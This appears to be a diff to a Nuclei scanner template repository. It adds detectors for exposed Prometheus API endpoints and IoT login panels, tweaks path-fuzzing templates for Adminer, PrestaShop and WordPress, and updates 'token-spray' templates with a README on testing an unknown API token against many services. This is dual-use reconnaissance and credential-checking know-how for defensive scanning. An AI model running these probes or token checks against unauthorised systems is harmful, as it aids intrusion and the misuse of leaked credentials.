+ - type: word
+ part: header
+ words:
+ - 'application/json'
diff --git a/exposures/configs/prometheus-flags-endpoint.yaml b/exposures/configs/prometheus-flags-endpoint.yaml
new file mode 100644
index 0000000000..0cefa431fc
--- /dev/null
+++ b/exposures/configs/prometheus-flags-endpoint.yaml
@@ -0,0 +1,37 @@
+id: prometheus-flags-endpoint
+
+info:
+ name: Prometheus flags API endpoint
+ author: geeknik
+ severity: info
+ description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username.
+ reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
+ tags: prometheus,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/v1/status/flags"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '"data":'
+ - '"config.file":'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
+
+ extractors:
+ - type: regex
+ name: web_admin_enabled
+ regex:
+ - '\"web\.enable\-admin\-api\"\: \"true\"'
diff --git a/exposures/configs/prometheus-targets-endpoint.yaml b/exposures/configs/prometheus-targets-endpoint.yaml
new file mode 100644
index 0000000000..cd326bed1c
--- /dev/null
+++ b/exposures/configs/prometheus-targets-endpoint.yaml
@@ -0,0 +1,31 @@
+id: prometheus-targets-endpoint
+
+info:
+ name: Prometheus targets API endpoint
+ author: geeknik
+ severity: info
+ description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer’s knowledge.
+ reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
+ tags: prometheus,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/v1/targets"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '{"status":"success","data":'
+ - 'Labels'
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - 'application/json'
diff --git a/exposures/files/sensitive-storage-exposure.yaml b/exposures/files/sensitive-storage-exposure.yaml
index 5db4e2330b..a65916dea3 100644
--- a/exposures/files/sensitive-storage-exposure.yaml
+++ b/exposures/files/sensitive-storage-exposure.yaml
@@ -15,6 +15,7 @@ requests:
- "{{BaseURL}}/server/storage/"
- "{{BaseURL}}/intikal/storage/"
- "{{BaseURL}}/elocker_old/storage/"
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml
index ad8ba27848..0676457b68 100644
--- a/fuzzing/adminer-panel-fuzz.yaml
+++ b/fuzzing/adminer-panel-fuzz.yaml
@@ -23,17 +23,17 @@ requests:
payloads:
path: helpers/wordlists/adminer-paths.txt
- attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- "- Adminer"
- - "partial(verifyVersion, "
- condition: and
+ - "partial(verifyVersion"
+
- type: status
status:
- 200
diff --git a/fuzzing/mdb-database-file.yaml b/fuzzing/mdb-database-file.yaml
index 2fe78b348f..4eab49564e 100644
--- a/fuzzing/mdb-database-file.yaml
+++ b/fuzzing/mdb-database-file.yaml
@@ -14,12 +14,10 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Accept-Language: en-US,en;q=0.9
- Connection: close
payloads:
mdbPaths: helpers/wordlists/mdb-paths.txt
- attack: sniper
threads: 50
max-size: 500 # Size in bytes - Max Size to read from server response
stop-at-first-match: true
diff --git a/fuzzing/prestashop-module-fuzz.yaml b/fuzzing/prestashop-module-fuzz.yaml
index 63fd397d99..11072add7c 100644
--- a/fuzzing/prestashop-module-fuzz.yaml
+++ b/fuzzing/prestashop-module-fuzz.yaml
@@ -1,4 +1,5 @@
id: prestashop-module-fuzz
+
info:
name: Prestashop Modules Enumeration
author: meme-lord
@@ -16,19 +17,18 @@ requests:
payloads:
path: helpers/wordlists/prestashop-modules.txt
- attack: sniper
- threads: 50
+ threads: 50
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- ""
- ""
- ""
- ""
- ""
- condition: and
- type: status
status:
diff --git a/fuzzing/wordpress-plugins-detect.yaml b/fuzzing/wordpress-plugins-detect.yaml
index 1af3f07971..c9f21082e4 100644
--- a/fuzzing/wordpress-plugins-detect.yaml
+++ b/fuzzing/wordpress-plugins-detect.yaml
@@ -1,4 +1,5 @@
id: wordpress-plugins-detect
+
info:
name: WordPress Plugins Detection
author: 0xcrypto
@@ -13,11 +14,8 @@ requests:
payloads:
pluginSlug: helpers/wordlists/wordpress-plugins.txt
- attack: sniper
- threads: 50
- redirects: true
- max-redirects: 1
+ threads: 50
matchers-condition: and
matchers:
- type: status
diff --git a/fuzzing/wordpress-themes-detect.yaml b/fuzzing/wordpress-themes-detect.yaml
index 9343703599..dd98af2fe3 100644
--- a/fuzzing/wordpress-themes-detect.yaml
+++ b/fuzzing/wordpress-themes-detect.yaml
@@ -1,4 +1,5 @@
id: wordpress-themes-detect
+
info:
name: WordPress Theme Detection
author: 0xcrypto
@@ -13,11 +14,8 @@ requests:
payloads:
themeSlug: helpers/wordlists/wordpress-themes.txt
- attack: sniper
- threads: 50
- redirects: true
- max-redirects: 1
+ threads: 50
matchers-condition: and
matchers:
- type: status
diff --git a/iot/codian-mcu-login.yaml b/iot/codian-mcu-login.yaml
new file mode 100644
index 0000000000..56f05a6e19
--- /dev/null
+++ b/iot/codian-mcu-login.yaml
@@ -0,0 +1,24 @@
+id: codian-mcu-login
+
+info:
+ name: Codian MCU Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/7404
+ tags: iot
+ metadata:
+ shodan: 'http.title:"Codian MCU - Home page"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Codian MCU - login:'
+ - type: status
+ status:
+ - 200
diff --git a/iot/envision-gateway.yaml b/iot/envision-gateway.yaml
new file mode 100644
index 0000000000..fb1440730d
--- /dev/null
+++ b/iot/envision-gateway.yaml
@@ -0,0 +1,24 @@
+id: envision-gateway
+
+info:
+ name: EnvisionGateway
+ author: dhiyaneshDK
+ severity: low
+ reference: https://www.exploit-db.com/ghdb/7315
+ tags: iot
+ metadata:
+ shodan: 'http.title:"EnvisionGateway"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/#'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'EnvisionGateway'
+ - type: status
+ status:
+ - 200
diff --git a/iot/heatmiser-wifi-thermostat.yaml b/iot/heatmiser-wifi-thermostat.yaml
new file mode 100644
index 0000000000..3426a7ebf4
--- /dev/null
+++ b/iot/heatmiser-wifi-thermostat.yaml
@@ -0,0 +1,24 @@
+id: heatmiser-wifi-thermostat
+
+info:
+ name: Heatmiser Wifi Thermostat
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/7445
+ tags: iot
+ metadata:
+ shodan: 'http.title:"Heatmiser Wifi Thermostat"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/index.htm'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Heatmiser Wifi Thermostat'
+ - type: status
+ status:
+ - 200
diff --git a/iot/webcamxp-5.yaml b/iot/webcamxp-5.yaml
new file mode 100644
index 0000000000..8b63f6cc6e
--- /dev/null
+++ b/iot/webcamxp-5.yaml
@@ -0,0 +1,24 @@
+id: webcamxp-5
+
+info:
+ name: webcamXP 5
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/7448
+ tags: iot
+ metadata:
+ shodan: 'http.title:"webcamXP 5"'
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/home.html'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'webcamXP 5'
+ - type: status
+ status:
+ - 200
diff --git a/miscellaneous/ntlm-directories.yaml b/miscellaneous/ntlm-directories.yaml
index 1733d4647d..a36f3f1287 100644
--- a/miscellaneous/ntlm-directories.yaml
+++ b/miscellaneous/ntlm-directories.yaml
@@ -14,6 +14,7 @@ requests:
Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
+ threads: 50
payloads:
path:
- /
@@ -63,9 +64,6 @@ requests:
- /webticket/webticketservice.svcabs/
- /adfs/services/trust/2005/windowstransport
- attack: sniper
- threads: 50
-
matchers-condition: and
matchers:
- type: dsl
diff --git a/misconfiguration/zenphoto-sensitive-info.yaml b/misconfiguration/zenphoto-sensitive-info.yaml
index 5f9225ea95..b3ba0c441a 100644
--- a/misconfiguration/zenphoto-sensitive-info.yaml
+++ b/misconfiguration/zenphoto-sensitive-info.yaml
@@ -16,6 +16,7 @@ requests:
- '{{BaseURL}}/gallery/zp-core/setup/index.php'
- '{{BaseURL}}/zp-core/setup/index.php'
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
diff --git a/network/detect-jabber-xmpp.yaml b/network/detect-jabber-xmpp.yaml
new file mode 100644
index 0000000000..7dbfdd8e64
--- /dev/null
+++ b/network/detect-jabber-xmpp.yaml
@@ -0,0 +1,24 @@
+id: detect-jabber-xmpp
+
+info:
+ name: Detects Jabber XMPP Instance
+ author: geeknik
+ severity: info
+ description: Jabber is the original name of the Extensible Messaging and Presence Protocol (XMPP), the open technology for instant messaging and presence.
+ reference: https://datatracker.ietf.org/doc/html/rfc6120
+ tags: network,jabber,xmpp
+
+network:
+ - inputs:
+ - data: "a\n"
+
+ host:
+ - "{{Hostname}}"
+ - "{{Hostname}}:5222"
+
+ matchers:
+ - type: word
+ words:
+ - "stream:stream xmlns:stream"
+ - "stream:error xmlns:stream"
+ condition: or
diff --git a/technologies/aviatrix-detect.yaml b/technologies/aviatrix-detect.yaml
index 343b261d8b..64be83fd08 100644
--- a/technologies/aviatrix-detect.yaml
+++ b/technologies/aviatrix-detect.yaml
@@ -5,6 +5,8 @@ info:
author: pikpikcu,philippedelteil
severity: info
tags: tech,aviatrix
+ metadata:
+ shodan-query: http.title:"AviatrixController", http.title:"Aviatrix Cloud Controller"
requests:
- method: GET
diff --git a/technologies/aws/aws-bucket-service.yaml b/technologies/aws/aws-bucket-service.yaml
index ad824b8670..f2d61d54f4 100644
--- a/technologies/aws/aws-bucket-service.yaml
+++ b/technologies/aws/aws-bucket-service.yaml
@@ -18,7 +18,7 @@ requests:
- contains(tolower(all_headers), 'x-amz-bucket')
- contains(tolower(all_headers), 'x-amz-request')
- contains(tolower(all_headers), 'x-amz-id')
- - contains(tolower(all_headers), 'AmazonS3')
+ - contains(tolower(all_headers), 'amazons3')
part: header
condition: or
diff --git a/token-spray/README.md b/token-spray/README.md
index 24081b4662..4c463e5694 100644
--- a/token-spray/README.md
+++ b/token-spray/README.md
@@ -1,15 +1,19 @@
## About
+
This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
## Usage
-You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
-```bash
-# Run Nuclei specifying all the api templates:
+token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
-nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest
+```console
+# Running token-spray templates against a single token to test
+nuclei -t token-spray/ -var token=random-token-to-test
+
+# Running token-spray templates against a file containing multiple new line delimited tokens
+nuclei -t token-spray/ -var token=file_with_tokens.txt
```
## Credits
-These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
+These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
\ No newline at end of file
diff --git a/token-spray/asana.yaml b/token-spray/asana.yaml
index 9282cf7a4d..482dc7bdd9 100644
--- a/token-spray/asana.yaml
+++ b/token-spray/asana.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,asana
+self-contained: true
requests:
- method: GET
path:
@@ -16,6 +17,6 @@ requests:
matchers:
- type: status
+ negative: true
status:
- 401
- negative: true
diff --git a/token-spray/bingmaps.yaml b/token-spray/bingmaps.yaml
index 0892d85b9f..17c0d216aa 100644
--- a/token-spray/bingmaps.yaml
+++ b/token-spray/bingmaps.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,bing,maps,bingmaps
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/bitly.yaml b/token-spray/bitly.yaml
index 57e1d5d3d4..01c70c7974 100644
--- a/token-spray/bitly.yaml
+++ b/token-spray/bitly.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,bitly
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/buildkite.yaml b/token-spray/buildkite.yaml
index 77e8e1e677..350b8edd1b 100644
--- a/token-spray/buildkite.yaml
+++ b/token-spray/buildkite.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buildkite
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/buttercms.yaml b/token-spray/buttercms.yaml
index 229da7b1d5..15d86d53fe 100644
--- a/token-spray/buttercms.yaml
+++ b/token-spray/buttercms.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,buttercms
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/calendly.yaml b/token-spray/calendly.yaml
index 1d8289fb37..b54a5c8df8 100644
--- a/token-spray/calendly.yaml
+++ b/token-spray/calendly.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,calendly
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/circleci.yaml b/token-spray/circleci.yaml
index 281d22b656..d519f10651 100644
--- a/token-spray/circleci.yaml
+++ b/token-spray/circleci.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,circle,circleci
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/deviantart.yaml b/token-spray/deviantart.yaml
index 403b97a349..ab73e7ea0d 100644
--- a/token-spray/deviantart.yaml
+++ b/token-spray/deviantart.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,deviantart
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/dropbox.yaml b/token-spray/dropbox.yaml
index 29679e2b2f..339837160e 100644
--- a/token-spray/dropbox.yaml
+++ b/token-spray/dropbox.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,dropbox
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/github.yaml b/token-spray/github.yaml
index c6d1d560de..4722dfe6d3 100644
--- a/token-spray/github.yaml
+++ b/token-spray/github.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,github
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-autocomplete.yaml b/token-spray/google-autocomplete.yaml
index b3c459082e..ae81be1c96 100644
--- a/token-spray/google-autocomplete.yaml
+++ b/token-spray/google-autocomplete.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,autocomplete
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-customsearch.yaml b/token-spray/google-customsearch.yaml
index 0be1636139..61af504633 100644
--- a/token-spray/google-customsearch.yaml
+++ b/token-spray/google-customsearch.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-directions.yaml b/token-spray/google-directions.yaml
index a6b8cea46b..97aaf95d6c 100644
--- a/token-spray/google-directions.yaml
+++ b/token-spray/google-directions.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,directions
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-elevation.yaml b/token-spray/google-elevation.yaml
index 480bc31fb7..31b68e98de 100644
--- a/token-spray/google-elevation.yaml
+++ b/token-spray/google-elevation.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,elevation
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-fcm.yaml b/token-spray/google-fcm.yaml
index aba6f43579..8ca7a1653f 100644
--- a/token-spray/google-fcm.yaml
+++ b/token-spray/google-fcm.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,fcm,firebase,cloud,messaging
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/google-findplacefromtext.yaml b/token-spray/google-findplacefromtext.yaml
index dcecba34b2..1fe4c209e8 100644
--- a/token-spray/google-findplacefromtext.yaml
+++ b/token-spray/google-findplacefromtext.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,find,text
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-gedistancematrix.yaml b/token-spray/google-gedistancematrix.yaml
index 62795ea15e..42987ebfe1 100644
--- a/token-spray/google-gedistancematrix.yaml
+++ b/token-spray/google-gedistancematrix.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,distance,matrix
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-geocode.yaml b/token-spray/google-geocode.yaml
index 91826af391..dbba7431d5 100644
--- a/token-spray/google-geocode.yaml
+++ b/token-spray/google-geocode.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,geocode
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-geolocation.yaml b/token-spray/google-geolocation.yaml
index 88d1ce9ffc..a322b89967 100644
--- a/token-spray/google-geolocation.yaml
+++ b/token-spray/google-geolocation.yaml
@@ -6,19 +6,21 @@ info:
severity: info
tags: token-spray,google,geolocation
+self-contained: true
requests:
- method: GET
path:
- "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}"
- matchers-condition: and
+ matchers-condition: and
matchers:
- type: word
part: body
+ negative: true
words:
- 'error'
- negative: true
+
- type: status
+ negative: true
status:
- 404
- negative: true
diff --git a/token-spray/google-mapsembed.yaml b/token-spray/google-mapsembed.yaml
index d7b47585f1..f8689ae282 100644
--- a/token-spray/google-mapsembed.yaml
+++ b/token-spray/google-mapsembed.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps,embed
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-mapsembedadvanced.yaml b/token-spray/google-mapsembedadvanced.yaml
index 5f8e4d2721..171ff4b005 100644
--- a/token-spray/google-mapsembedadvanced.yaml
+++ b/token-spray/google-mapsembedadvanced.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps,embed
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-nearbysearch.yaml b/token-spray/google-nearbysearch.yaml
index 752d9d9814..db0dda7fab 100644
--- a/token-spray/google-nearbysearch.yaml
+++ b/token-spray/google-nearbysearch.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search,nearby
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-nearestroads.yaml b/token-spray/google-nearestroads.yaml
index e804422ff0..9551876122 100644
--- a/token-spray/google-nearestroads.yaml
+++ b/token-spray/google-nearestroads.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,roads
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-placedetails.yaml b/token-spray/google-placedetails.yaml
index 30ca3e6184..2f6cf7d464 100644
--- a/token-spray/google-placedetails.yaml
+++ b/token-spray/google-placedetails.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,place,details
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-placesphoto.yaml b/token-spray/google-placesphoto.yaml
index 82f33c2e1d..6b6b3cd539 100644
--- a/token-spray/google-placesphoto.yaml
+++ b/token-spray/google-placesphoto.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,places,photo
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-playablelocations.yaml b/token-spray/google-playablelocations.yaml
index 2e38d6316a..6dce339499 100644
--- a/token-spray/google-playablelocations.yaml
+++ b/token-spray/google-playablelocations.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,playable,locations
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-routetotraveled.yaml b/token-spray/google-routetotraveled.yaml
index c97cfcee59..2c0853eda0 100644
--- a/token-spray/google-routetotraveled.yaml
+++ b/token-spray/google-routetotraveled.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,route
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-speedlimit.yaml b/token-spray/google-speedlimit.yaml
index 5eec3d0a53..e5e8290a6a 100644
--- a/token-spray/google-speedlimit.yaml
+++ b/token-spray/google-speedlimit.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,speed,limit
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-staticmaps.yaml b/token-spray/google-staticmaps.yaml
index d4a012bff2..ba4ee679ca 100644
--- a/token-spray/google-staticmaps.yaml
+++ b/token-spray/google-staticmaps.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,maps
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-streetview.yaml b/token-spray/google-streetview.yaml
index 49d043391d..d7156a7295 100644
--- a/token-spray/google-streetview.yaml
+++ b/token-spray/google-streetview.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,streetview
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/google-timezone.yaml b/token-spray/google-timezone.yaml
index 273101bcc9..40b13b61ca 100644
--- a/token-spray/google-timezone.yaml
+++ b/token-spray/google-timezone.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,timezone
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/googlet-extsearchplaces.yaml b/token-spray/googlet-extsearchplaces.yaml
index c3683703cf..290da60328 100644
--- a/token-spray/googlet-extsearchplaces.yaml
+++ b/token-spray/googlet-extsearchplaces.yaml
@@ -6,6 +6,7 @@ info:
severity: info
tags: token-spray,google,search,places,text
+self-contained: true
requests:
- method: GET
path:
@@ -14,6 +15,6 @@ requests:
matchers:
- type: word
part: body
+ negative: true
words:
- 'error_message'
- negative: true
diff --git a/token-spray/heroku.yaml b/token-spray/heroku.yaml
index 9f08e416d5..ef81ec91e8 100644
--- a/token-spray/heroku.yaml
+++ b/token-spray/heroku.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,heroku
+self-contained: true
requests:
- method: POST
path:
@@ -17,9 +18,9 @@ requests:
matchers:
- type: status
+ condition: or
status:
- 200
- 201
- 202
- 206
- condition: or
diff --git a/token-spray/hubspot.yaml b/token-spray/hubspot.yaml
index 86566864f0..da95a4b12a 100644
--- a/token-spray/hubspot.yaml
+++ b/token-spray/hubspot.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,hubspot
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/instagram.yaml b/token-spray/instagram.yaml
index 289546f452..dd851bee3e 100644
--- a/token-spray/instagram.yaml
+++ b/token-spray/instagram.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,instagram,graph
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/ipstack.yaml b/token-spray/ipstack.yaml
index f64daea02e..ac527d2a1e 100644
--- a/token-spray/ipstack.yaml
+++ b/token-spray/ipstack.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,ipstack
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/iterable.yaml b/token-spray/iterable.yaml
index 0c1f84d566..69da55de5d 100644
--- a/token-spray/iterable.yaml
+++ b/token-spray/iterable.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,iterable
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/jumpcloud.yaml b/token-spray/jumpcloud.yaml
index a885c5c780..dbf3c9ab35 100644
--- a/token-spray/jumpcloud.yaml
+++ b/token-spray/jumpcloud.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,jumpcloud
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/lokalise.yaml b/token-spray/lokalise.yaml
index 0c937b51fa..5003f25b31 100644
--- a/token-spray/lokalise.yaml
+++ b/token-spray/lokalise.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,lokalise
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/loqate.yaml b/token-spray/loqate.yaml
index d0ed434602..dcbf5b156d 100644
--- a/token-spray/loqate.yaml
+++ b/token-spray/loqate.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,loqate
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/mailchimp.yaml b/token-spray/mailchimp.yaml
index 9d7073e46c..d25870e279 100644
--- a/token-spray/mailchimp.yaml
+++ b/token-spray/mailchimp.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailchimp
+self-contained: true
network:
- inputs:
- data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n"
diff --git a/token-spray/mailgun.yaml b/token-spray/mailgun.yaml
index 3667ba1c69..c4997aaaa4 100644
--- a/token-spray/mailgun.yaml
+++ b/token-spray/mailgun.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mailgun
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/mapbox.yaml b/token-spray/mapbox.yaml
index c4640d9695..1e246f783b 100644
--- a/token-spray/mapbox.yaml
+++ b/token-spray/mapbox.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,mapbox
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/nerdgraph.yaml b/token-spray/nerdgraph.yaml
index d67d458faa..ca570964e4 100644
--- a/token-spray/nerdgraph.yaml
+++ b/token-spray/nerdgraph.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,newrelic,nerdgraph
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/npm.yaml b/token-spray/npm.yaml
index cfe2c86746..fb0ef0b6b7 100644
--- a/token-spray/npm.yaml
+++ b/token-spray/npm.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,node,npm,package,manager
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/openweather.yaml b/token-spray/openweather.yaml
index 1a9a5058e3..916936aa97 100644
--- a/token-spray/openweather.yaml
+++ b/token-spray/openweather.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,weather,openweather
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/pagerduty.yaml b/token-spray/pagerduty.yaml
index fcc00d7e88..bad59948ed 100644
--- a/token-spray/pagerduty.yaml
+++ b/token-spray/pagerduty.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pagerduty
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/pendo.yaml b/token-spray/pendo.yaml
index 8ea141bcc0..66cd885dc6 100644
--- a/token-spray/pendo.yaml
+++ b/token-spray/pendo.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pendo
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/pivotaltracker.yaml b/token-spray/pivotaltracker.yaml
index c52e04af9a..d7a74ded66 100644
--- a/token-spray/pivotaltracker.yaml
+++ b/token-spray/pivotaltracker.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,pivotaltracker
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/postmark.yaml b/token-spray/postmark.yaml
index 5b5aead0dc..85367b5c61 100644
--- a/token-spray/postmark.yaml
+++ b/token-spray/postmark.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,postmark
+self-contained: true
requests:
- method: GET
path:
diff --git a/token-spray/sendgrid.yaml b/token-spray/sendgrid.yaml
index b887b0b7d1..d9330371f1 100644
--- a/token-spray/sendgrid.yaml
+++ b/token-spray/sendgrid.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,sendgrid
+self-contained: true
network:
- inputs:
- data: "ehlo\r\n"
diff --git a/token-spray/slack.yaml b/token-spray/slack.yaml
index 2703830f3a..8203aa56b5 100644
--- a/token-spray/slack.yaml
+++ b/token-spray/slack.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,slack
+self-contained: true
requests:
- method: POST
path:
diff --git a/token-spray/sonarcloud.yaml b/token-spray/sonarcloud.yaml
index fdf0dc6724..aed9d1760f 100644
--- a/token-spray/sonarcloud.yaml
+++ b/token-spray/sonarcloud.yaml
@@ -7,6 +7,7 @@ info:
severity: info
tags: token-spray,sonarcloud
